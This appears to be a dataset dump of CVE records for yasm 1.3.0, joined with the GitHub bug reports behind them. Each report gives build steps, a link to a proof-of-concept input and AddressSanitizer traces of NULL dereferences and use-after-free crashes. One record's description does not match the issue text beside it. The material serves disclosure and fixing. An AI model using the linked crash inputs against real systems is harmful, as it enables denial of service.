[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-3811-find_cc-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==14891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f8500dab0e4 bp 0x7ffc37b91380 sp 0x7ffc37b91340 T0) #0 0x7f8500dab0e3 in find_cc test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3815 #1 0x7f8500db0692 in expand_mmac_params test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3986 #2 0x7f8500dc08e8 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5078 #3 0x7f8500da9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f8500d9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f8500d8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f8500d8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f8503f0482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3815 find_cc ==14891==ABORTING ```
A NULL pointer dereference in the function find_cc() modules/preprocs/nasm/nasm-pp.c:3815
https://api.github.com/repos/yasm/yasm/issues/170/comments
1
2021-05-19T08:26:28Z
2024-03-21T12:44:18Z
https://github.com/yasm/yasm/issues/170
895,147,145
170
CVE-2021-33459
2022-07-26T13:15:09.500
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in nasm_parser_directive() in modules/parsers/nasm/nasm-parse.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/167
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1595-nasm_parser_directive-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==13148==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3a60e8fbb7 bp 0x7fff5f933810 sp 0x7fff5f933720 T0) #0 0x7f3a60e8fbb6 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1596 #1 0x7f3a60e9bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #2 0x7f3a60e9bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #3 0x7f3a60e8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #4 0x7f3a60e8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #5 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #6 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #7 0x7f3a6405182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1596 nasm_parser_directive ==13148==ABORTING ```
A NULL pointer dereference in the function nasm_parser_directive() modules/parsers/nasm/nasm-parse.c:1596
https://api.github.com/repos/yasm/yasm/issues/167/comments
1
2021-05-19T08:23:17Z
2024-03-21T11:50:13Z
https://github.com/yasm/yasm/issues/167
895,144,100
167
CVE-2021-33460
2022-07-26T13:15:09.547
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in if_condition() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/168
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-2134-if_condition-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==13685==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f1a02e5e870 bp 0x7fffcb38b530 sp 0x7fffcb38b380 T0) #0 0x7f1a02e5e86f in if_condition test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2134 #1 0x7f1a02eb88c7 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2907 #2 0x7f1a02ec0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #3 0x7f1a02ea9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f1a02e9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f1a02e8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f1a02e8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f1a0603682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2134 if_condition ==13685==ABORTING ```
A NULL pointer dereference in the function if_condition() modules/preprocs/nasm/nasm-pp.c:2134
https://api.github.com/repos/yasm/yasm/issues/168/comments
1
2021-05-19T08:24:08Z
2024-03-21T11:51:21Z
https://github.com/yasm/yasm/issues/168
895,144,888
168
CVE-2021-33461
2022-07-26T13:15:09.590
An issue was discovered in yasm version 1.3.0. There is a use-after-free in yasm_intnum_destroy() in libyasm/intnum.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/161" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/161
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#149](https://github.com/yasm/yasm/issues/149) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-415-yasm_intnum_destroy-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==16102==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000007098 at pc 0x7ffa04efacb7 bp 0x7fff5b056900 sp 0x7fff5b0568f0 READ of size 4 at 0x602000007098 thread T0 #0 0x7ffa04efacb6 in yasm_intnum_destroy test/yasm-uaf/SRC_asan/libyasm/intnum.c:415 #1 0x7ffa04ee7e69 in expr_delete_term test/yasm-uaf/SRC_asan/libyasm/expr.c:1017 #2 0x7ffa04ee7e69 in expr_simplify_identity test/yasm-uaf/SRC_asan/libyasm/expr.c:582 #3 0x7ffa04ee8e3c in expr_level_op test/yasm-uaf/SRC_asan/libyasm/expr.c:700 #4 0x7ffa04eea5d1 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:880 #5 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #6 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #7 0x7ffa04eeb686 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:906 #8 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #9 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #10 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #11 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #12 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #13 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #14 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #15 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #16 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #17 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #18 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x602000007098 is located 8 bytes inside of 16-byte region [0x602000007090,0x6020000070a0) freed by thread T0 here: #0 0x7ffa051c52ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7ffa04ee887c in expr_level_op test/yasm-uaf/SRC_asan/libyasm/expr.c:689 #2 0x7ffa04eea5d1 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:880 #3 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #4 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #5 0x7ffa04eeb686 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:906 #6 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #7 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #8 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #9 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #10 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #11 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #12 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #13 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #14 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #15 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #16 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7ffa051c5602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffa04f16769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7ffa04efab26 in yasm_intnum_copy test/yasm-uaf/SRC_asan/libyasm/intnum.c:397 #3 0x7ffa04ee33e4 in expr_item_copy test/yasm-uaf/SRC_asan/libyasm/expr.c:975 #4 0x7ffa04ee33e4 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:1006 #5 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:834 #6 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:843 #7 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:839 #8 0x7ffa04eebc13 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:905 #9 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #10 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #11 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #12 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #13 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #14 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #15 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #16 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #17 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #18 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #19 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/libyasm/intnum.c:415 yasm_intnum_destroy Shadow bytes around the buggy address: 0x0c047fff8dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff8e10: fa fa fd[fd]fa fa 00 00 fa fa 00 00 fa fa fd fa 0x0c047fff8e20: fa fa fd fa fa fa 07 fa fa fa fd fa fa fa fd fa 0x0c047fff8e30: fa fa 07 fa fa fa 00 00 fa fa 00 00 fa fa 07 fa 0x0c047fff8e40: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff8e50: fa fa fd fa fa fa 03 fa fa fa 00 00 fa fa 00 00 0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==16102==ABORTING ```
AddressSanitizer: heap-use-after-free in yasm_intnum_destroy() libyasm/intnum.c:415
https://api.github.com/repos/yasm/yasm/issues/161/comments
3
2021-05-19T08:15:14Z
2024-03-21T11:56:29Z
https://github.com/yasm/yasm/issues/161
895,135,903
161
CVE-2021-33462
2022-07-26T13:15:09.647
An issue was discovered in yasm version 1.3.0. There is a use-after-free in expr_traverse_nodes_post() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/165
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#126](https://github.com/yasm/yasm/issues/126 ) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1226-expr_traverse_nodes_post-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==11980==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000e5b0 at pc 0x7f418ef4a94b bp 0x7ffedeadea70 sp 0x7ffedeadea60 READ of size 4 at 0x60600000e5b0 thread T0 #0 0x7f418ef4a94a in expr_traverse_nodes_post test/yasm-uaf/SRC_asan/libyasm/expr.c:1112 #1 0x7f418ef4a94a in yasm_expr_destroy test/yasm-uaf/SRC_asan/libyasm/expr.c:1045 #2 0x7f418b7ebda1 in bin_section_data_destroy test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1684 #3 0x7f418ef2e548 in yasm__assoc_data_destroy test/yasm-uaf/SRC_asan/libyasm/assocdat.c:128 #4 0x7f418ef6dd24 in yasm_section_destroy test/yasm-uaf/SRC_asan/libyasm/section.c:676 #5 0x7f418ef6dd24 in yasm_object_destroy test/yasm-uaf/SRC_asan/libyasm/section.c:470 #6 0x404ad4 in cleanup test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:799 #7 0x4053e3 in check_errors test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:778 #8 0x402c9a in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:524 #9 0x402c9a in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60600000e5b0 is located 16 bytes inside of 56-byte region [0x60600000e5a0,0x60600000e5d8) freed by thread T0 here: #0 0x7f418f2292ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f418ef76caa in yasm_dir_helper_expr test/yasm-uaf/SRC_asan/libyasm/valparam.c:312 #2 0x7f418ef769ff in yasm_dir_helper test/yasm-uaf/SRC_asan/libyasm/valparam.c:241 #3 0x7f418b7eb34b in bin_objfmt_section_switch test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1521 #4 0x7f418ef6cd75 in dir_section test/yasm-uaf/SRC_asan/libyasm/section.c:154 #5 0x7f418ef6d838 in yasm_object_directive test/yasm-uaf/SRC_asan/libyasm/section.c:377 #6 0x7f418b78f804 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1569 #7 0x7f418b79bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #8 0x7f418b79bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #9 0x7f418b78f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #10 0x7f418b78f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #11 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #12 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #13 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f418f229602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f418ef7a769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f418ef46fd2 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:998 #3 0x7f418ef76cd0 in yasm_dir_helper_expr test/yasm-uaf/SRC_asan/libyasm/valparam.c:313 #4 0x7f418ef769ff in yasm_dir_helper test/yasm-uaf/SRC_asan/libyasm/valparam.c:241 #5 0x7f418b7eb34b in bin_objfmt_section_switch test/yasm-uaf/SRC_asan/modules/objfmts/bin/bin-objfmt.c:1521 #6 0x7f418ef6cd75 in dir_section test/yasm-uaf/SRC_asan/libyasm/section.c:154 #7 0x7f418ef6d838 in yasm_object_directive test/yasm-uaf/SRC_asan/libyasm/section.c:377 #8 0x7f418b78f804 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1569 #9 0x7f418b79bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #10 0x7f418b79bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #11 0x7f418b78f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #12 0x7f418b78f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #13 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #14 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #15 0x7f418e96f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/libyasm/expr.c:1112 expr_traverse_nodes_post Shadow bytes around the buggy address: 0x0c0c7fff9c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9ca0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fa =>0x0c0c7fff9cb0: fa fa fa fa fd fd[fd]fd fd fd fd fa fa fa fa fa 0x0c0c7fff9cc0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fff9cd0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9ce0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9cf0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fff9d00: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11980==ABORTING ```
